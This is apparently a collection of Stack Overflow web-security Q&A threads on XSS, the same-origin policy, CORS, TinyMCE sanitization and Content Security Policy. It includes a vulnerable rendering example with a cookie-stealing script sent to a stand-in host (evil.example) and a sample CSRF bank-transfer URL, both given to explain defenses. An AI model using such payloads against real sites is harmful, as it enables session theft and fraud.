XSS still possible in modern browsers - javascript

I was curious whether XSS is still possible today. I have read a lot about browsers preventing it, but it seems I have missed something.
I tried a couple of approaches myself, including the simplest ones: AJAX calls (luckily blocked by the browser) and viewing the content of an <iframe> and <frameset>; no success either way.
I read about DOM XSS, but that will only work if the host has a page that echoes content from the URL parameters.
Question:
Are modern browsers safe, or are there reasons why I should log out of every service I use before leaving a page?

whether XSS is still possible today.
Yes, it is.
will only work if the host has a page that echoes content from the URL parameters.
XSS is possible whenever user input is output, either immediately (for a reflected attack) or later, possibly to a different person (for a stored attack). That is what XSS is.
The Same Origin Policy (and related security features that prevent access to content on a different origin) has nothing to do with XSS.
Are modern browsers safe
XSS is a vulnerability in code provided by the server that takes user input and does something with it. There is no way for the browser to tell whether user input is an XSS attack or a legitimate submission of data that happens to include live code. It has to be dealt with by server-provided code, since the input has to be treated with context sensitivity.
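To illustrate the point above, here is a minimal sketch (in plain JavaScript, with illustrative names and a hypothetical URL) of a reflected XSS bug: the server echoes a query parameter straight into the HTML response without encoding it.

```javascript
// VULNERABLE sketch: user input is inserted into markup without encoding.
// The function name and the evil.example URL are illustrative only.
function renderSearchPage(query) {
  return `<p>Results for: ${query}</p>`;
}

const payload =
  "<script>document.location='https://evil.example/?c='+document.cookie</script>";

// The payload is emitted as live markup; a browser rendering this
// response would execute the attacker's script.
console.log(renderSearchPage(payload));
```

The browser cannot distinguish this from a page that legitimately contains a script tag, which is why the encoding has to happen in server-side code that knows the output context.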

Related

PHP $_SERVER['HTTP_REFERER'] vs. Javascript document.referrer?

Ultimately I need to know what domain is hosting one of my JavaScript files. I have read, and experienced first hand, that $_SERVER['HTTP_REFERER'] is unreliable. One of the first three browser/computer combos I tested didn't send the HTTP_REFERER, and I know that it can be spoofed. I implemented a different solution using two JavaScript methods.
document.referrer
AND
window.location.href
I use the former to get the URL of the window where someone clicked on one of my links. I use the latter to see which domain my JavaScript file is included in. I have tested it a little so far and it is grabbing the URLs from the browser with no hiccups. My question is: are the two JavaScript methods reliable? Will they return the URL from the browser every time, or are there caveats like those with $_SERVER['HTTP_REFERER'] that I haven't run into yet?
You should always assume that any information about the referrer URI is going to be unavailable (or perhaps even unreliable), due to browsers or users wanting to conceal this information because of privacy issues.
In general, you won't have the referrer information when linking from an HTTPS to an HTTP domain. Check this question for more info on this:
https://webmasters.stackexchange.com/questions/47405/how-can-i-pass-referrer-header-from-my-https-domain-to-http-domains
About using window.location.href, I'd say it's reliable in practice, but only because it's in the client's interest to supply the correct information so that applications depending on it behave as expected.
Just keep in mind that this is still the client sending you information, so it will always be up to the browser to send you something correct. You can't control that; you can only trust that it will work according to what the standard specifies. The client might still decide to conceal it or fake it for any reason.
For example, in some situations, such as third-party included scripts (again for privacy reasons), the browser might opt to just leave it blank.
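As a sketch of the parsing side of this: in the browser you would read document.referrer and window.location.href directly; the snippet below uses plain strings instead so the logic can be shown in isolation, and relies on the standard WHATWG URL class. The empty-string case matters because document.referrer is often empty.

```javascript
// Extract the hostname from a referrer/location value, tolerating the
// empty string that browsers send when the referrer is concealed.
function hostOf(url) {
  try {
    return new URL(url).hostname;
  } catch (e) {
    // new URL("") throws -- treat a missing/invalid referrer as unknown.
    return null;
  }
}

console.log(hostOf("https://example.com/page?x=1")); // "example.com"
console.log(hostOf(""));                             // null
```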

tinymce storing generated markup in database security concerns

I have used tinymce as a part of a forum feature on my site. I am taking the innerHTML of the textarea and storing it inside a SQL database.
I retrieve the markup when viewing thread posts.
Is there any security concerns doing what I am doing? Does tinymce have any inbuilt features to stop malicious content / markup being added and therefore saved?
TinyMCE does a pretty good job at content scrubbing and input cleanup (on the client side). Being a very popular web rich-text editor, its creators have put a lot of work into making it fairly secure in terms of preventing simple copy-and-paste of malicious content into the editor. You can do things like enable/disable cleanup, specify which tags/attributes/characters are allowed, and so on.
See the TinyMCE Configuration Page. Options of note include: valid_elements, invalid_elements, verify_html, valid_styles, invalid_styles, and extended_valid_elements.
Also: instead of grabbing the innerHTML of the textarea, you should probably use TinyMCE's getContent() function. See: getContent()
BUT this is all client-side javascript!
Although these features are nice, all of this cleanup still happens on the client. So conceivably, the client JS could be modified to stop escaping/removing malicious content. Or someone could POST bad data to your request handlers without ever going through the browser (using curl, or any number of other tools).
So TinyMCE provides a nice baseline of client-side scrubbing; however, to be secure, the server should assume that anything it is sent is dirty and treat all content with caution.
Things that can be done by the server:
Even if you implement the most sophisticated client-side validation/scrubbing/prevention, that is worthless as far as your backend's security is concerned. An excellent reference for preventing malicious data injections can be found on the OWASP Cross Site Scripting Prevention Cheat Sheet and the OWASP SQL Injection Prevention Cheat Sheet. Not only do you have to protect against SQL injection type attacks, but also XSS attacks if any user submitted data will be displayed on the website for other unsuspecting users to view.
In addition to sanitizing user input data on the server, you can also try things such as mod_security to squash requests that contain patterns indicative of malicious requests. You can also enforce a max length of inputs on both the client and server side, as well as adding a max request size for your server to make sure someone doesn't try to send a GB of data. How to set a max request size will vary from server to server. Violations of max request size should result in an HTTP 413 / Request Entity Too Large response.
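A minimal sketch of the server-side size check described above (the limit and function names are illustrative, not part of TinyMCE or any framework):

```javascript
// Reject oversized post bodies before doing any further processing,
// mirroring the HTTP 413 behaviour described above.
const MAX_POST_BYTES = 64 * 1024; // arbitrary example limit

function checkPostSize(body) {
  const bytes = Buffer.byteLength(body, "utf8");
  if (bytes > MAX_POST_BYTES) {
    return { status: 413, error: "Request Entity Too Large" };
  }
  return { status: 200 };
}

console.log(checkPostSize("short post").status);       // 200
console.log(checkPostSize("x".repeat(100000)).status); // 413
```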
Further to @jCuga's excellent answer, you should implement a Content Security Policy on any pages where you output the rich text.
This allows you to effectively stop inline script from being executed by the browser. It is currently supported by modern browsers such as Chrome and Firefox.
This is done via an HTTP response header from your page.
e.g.
Content-Security-Policy: script-src 'self' https://apis.google.com
will stop inline JavaScript from being executed if a user managed to inject it into your page (it will be ignored with a warning), but will allow script tags referencing either your own server or https://apis.google.com. This can be customised to your needs as required.
Even if you use a HTML sanitizer to strip any malicious tags, it is a good idea to use this in combination with a CSP just in case anything slips through the net.

Why will disabling Browser Web Security (e.g. Chrome) help doing Cross-Site-Requests?

We have several internal web applications. One of those needs to access all the other applications. Problem is: Same-Orign-Policy.
Actually, I did manage to get around it. First of all, IE is quite sloppy when it comes to web security: it actually asked me whether I wanted these requests to go through or not. If I clicked yes, it just executed the cross-site requests.
But since most of the users won't use IE, there was the need to make it run in another browser.
So I tried to make it run in Google Chrome. After some research I found out that it will work when I turn off web security by using the command-line parameter --disable-web-security.
This did the job. But unfortunately, most users won't launch the browser with this parameter. Therefore I need another solution.
Then I came across CORS. CORS is implemented in Chrome, but it has one drawback (for me): I need to set headers on the server side.
For reasons I won't discuss in here, this is a no go.
So what I was actually wondering about is:
Why will disabling Browser's Web Security do the job, while I need the server to allow the request when using CORS?
What exactly happens inside the browser when I disable the web security?
And is there another way to execute my CSR without adding headers on the server's side or disabling the security?
Thanks in advance
EDIT: JSONP is out of the question too
Why will disabling Browser's Web Security do the job, while I need the server to allow the request when using CORS?
The point of the Same Origin Policy is to prevent Mallory's evil site from making Alice's browser go to Bob's site and expose Alice's data to Mallory.
Disabling security in the browser is, effectively, saying "I don't care about protecting my data on Bob's (or any other!) site". This is a dangerous thing to do if the browser is ever going to go near the open web. The option is provided to make development more convenient; I prefer a more controlled solution (such as the URL rewriting options in Charles proxy).
CORS is Bob's site saying "This URL doesn't contain any data that Mallory (or some other specific site, or everyone) shouldn't have access to, so they can access it." Bob's site can do this because it knows which parts of it contain public data and which parts contain private data.
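Concretely, that "saying" happens via response headers. A sketch of what Bob's server might send for a public endpoint (the origin value is illustrative):

```http
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://app.internal.example
Content-Type: application/json
```

The browser only exposes the response to the page if the page's origin matches what the header allows, which is why the server, not the browser, has to opt in.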
What exactly happens inside the browser when I disable the web security?
It disables the aforementioned security feature and reduces the protection of the user's data.
And is there another way to execute my CSR without adding headers on the server's side or disabling the security?
A proxy. See Ways to circumvent the same-origin policy, specifically the Reverse Proxy method.
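A hypothetical reverse-proxy sketch in nginx config (paths and hostnames are illustrative): because the browser only ever talks to one origin, the Same-Origin Policy is never triggered.

```nginx
# Requests to /other-app/ on the main origin are forwarded server-side
# to the other internal application; the browser sees a single origin.
location /other-app/ {
    proxy_pass https://other-app.internal.example/;
}
```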
I guess you are using AJAX requests, here is another question Ways to circumvent the same-origin policy that has a big detailed answer.
You can use a Flash object (Flash is not bound by the browser's Same-Origin Policy; it uses its own cross-domain policy mechanism, which the target server controls via crossdomain.xml)
Also about "whats the worst could happen" http://blogs.msdn.com/b/ieinternals/archive/2009/08/28/explaining-same-origin-policy-part-1-deny-read.aspx and http://en.wikipedia.org/wiki/Cross-site_scripting

Prevent HTML form action from being changed

I have a form on my page where users enter their credit card data. Is it possible in HTML to mark the form's action as constant, to prevent malicious JavaScript from changing the form's action property? I can imagine an XSS attack that changes the form URL to make users post their secret data to the attacker's site.
Is it possible? Or, is there a different feature in web browsers which prevents these kinds of attacks from happening?
This kind of attack is possible, but this is the wrong way to prevent against it. If a hacker can change the details of the form, they can just as easily send the secret data via an AJAX GET without submitting the form at all. The correct way to prevent an XSS attack is to be sure to encode all untrusted content on the page such that a hacker doesn't have the ability to execute their own JavaScript in the first place.
More on encoding...
Sample code on Stack Overflow is a great example of encoding. Imagine what a mess it would be if, every time someone posted some example JavaScript, it actually got executed in the browser. E.g.,
<script type="text/javascript">alert('foo');</script>
Were it not for the fact that SO encoded the above snippet, you would have just seen an alert box. This is of course a rather innocuous script - I could have coded some JavaScript that hijacked your session cookie and sent it to evil.com/hacked-sessions. Fortunately, however, SO doesn't assume that everyone is well intentioned, and actually encodes the content. If you were to view source, for example, you would see that SO has encoded my perfectly valid HTML and JavaScript into this:
&lt;script type="text/javascript"&gt;alert('foo');&lt;/script&gt;
So, rather than embedding actual < and > characters where I used them, they have been replaced with their HTML-encoded equivalents (&lt; and &gt;), which means that my code no longer represents a script tag.
Anyway, that's the general idea behind encoding. For more info on how you should be encoding, that depends on what you're using server-side, but most all web frameworks include some sort of "out-of-the-box" HTML Encoding utility. Your responsibility is to ensure that user-provided (or otherwise untrusted) content is ALWAYS encoded before being rendered.
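A minimal sketch of the kind of HTML-encoding utility most frameworks ship out of the box (the function name is illustrative). For element content and double-quoted attribute values, escaping these five characters is the essential step:

```javascript
// Replace the characters that have special meaning in HTML with their
// entity equivalents, so user content can never form new tags.
function encodeHTML(s) {
  return s
    .replace(/&/g, "&amp;")   // must be first, or it re-encodes the others
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

console.log(encodeHTML("<script>alert('foo');</script>"));
// &lt;script&gt;alert(&#39;foo&#39;);&lt;/script&gt;
```

Note that this is only correct for HTML body and quoted-attribute contexts; other contexts (URLs, JavaScript strings, CSS) need their own context-sensitive encoders, which is the point the OWASP cheat sheets make.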
Is there a different feature in web browsers which prevents these kinds of attacks from happening?
Your concern has since been addressed by newer browser releases through the new Content-Security-Policy header.
By configuring script-src, you can disallow inline JavaScript outright. Note that this protection will not necessarily extend to users on older browsers (see CanIUse).
Allowing only whitelisted scripts will defeat most JavaScript XSS attacks, but may require significant modifications to your content. Also, blocking inline JavaScript may be impractical if you are using a web framework that relies heavily on it.
Nope, nothing really prevents it.
The only thing I would suggest is to have some server-side validation of any information coming to the server from a user form.
As the saying goes: Never trust the user

What's the point of the Anti-Cross-Domain policy?

Why did the creators of the HTML DOM and/or Javascript decide to disallow cross-domain requests?
I can see some very small security benefits of disallowing it, but in the long run it seems to be an attempt at making JavaScript injection attacks less powerful. That is all moot anyway with JSONP; it just means that the JavaScript code is a tiny bit more difficult to write, and you have to have server-side cooperation (though it could be your own server).
The actual cross-domain issue is huge. Suppose SuperBank.com internally sends a request to http://www.superbank.com/transfer?amount=100&to=123456 to transfer $100 to account number 123456. If I can get you to my website while you are logged in at SuperBank, all I have to do is make your browser send that request to SuperBank.com to move money from your account to mine.
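A sketch of what that attack page could contain (the URL is the hypothetical one from the example above): the attacker does not even need to read the response, because the browser attaches the victim's SuperBank cookies to the request automatically.

```html
<!-- On Mallory's page: the browser fetches this "image", issuing the
     transfer request with the victim's session cookies attached. -->
<img src="http://www.superbank.com/transfer?amount=100&to=123456" alt="">
```

This is why state-changing endpoints need protection beyond the Same-Origin Policy (which restricts reading responses, not sending requests), such as CSRF tokens.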
The reason JSON-P is acceptable is that it is pretty darn impossible for it to be abused. A website using JSON-P is pretty much declaring the data to be public information, since that format is too inconvenient to ever be used otherwise. But if it's unclear as to whether or not data is public information, the browser must assume that it is not.
When cross-domain scripting is allowed (or hacked by a clever Javascripter), a webpage can access data from another webpage. Example: joeblow.com could access your Gmail while you have mail.google.com open. joeblow.com could read your email, spam your contacts, spoof mail from you, delete your mail, or any number of bad things.
To clarify some of the ideas in the questions into a specific use case..
The cross-domain policy is generally not there to protect you from yourself. It's there to protect the users of your website from the other users of your website (XSS).
Imagine you had a website that allowed people to enter any text they want, including JavaScript. Some malicious user decides to add some JavaScript to the "about yourself" field. Users of your website would navigate to his profile and have this script executed in their browser. This script, since it's being executed on your website's behalf, has access to cookies and the like from your website.
If the browser allowed for cross domain communication, this script could theoretically collect your info and then upload it to a server that the malicious user would own.
Here's a distinction for you: cross-domain AJAX allows a malicious site to make your browser do things on its behalf, while JSON-P allows a malicious server to tamper with a single domain's pages (and to make the browser do things to that domain on your behalf) but (crucial bit) only if the page served went out of its way to load the malicious payload.
So yes, JSON-P has some security implications, but they are strictly opt-in on the part of the website using them. Allowing general cross-domain AJAX opens up a much larger can of worms.
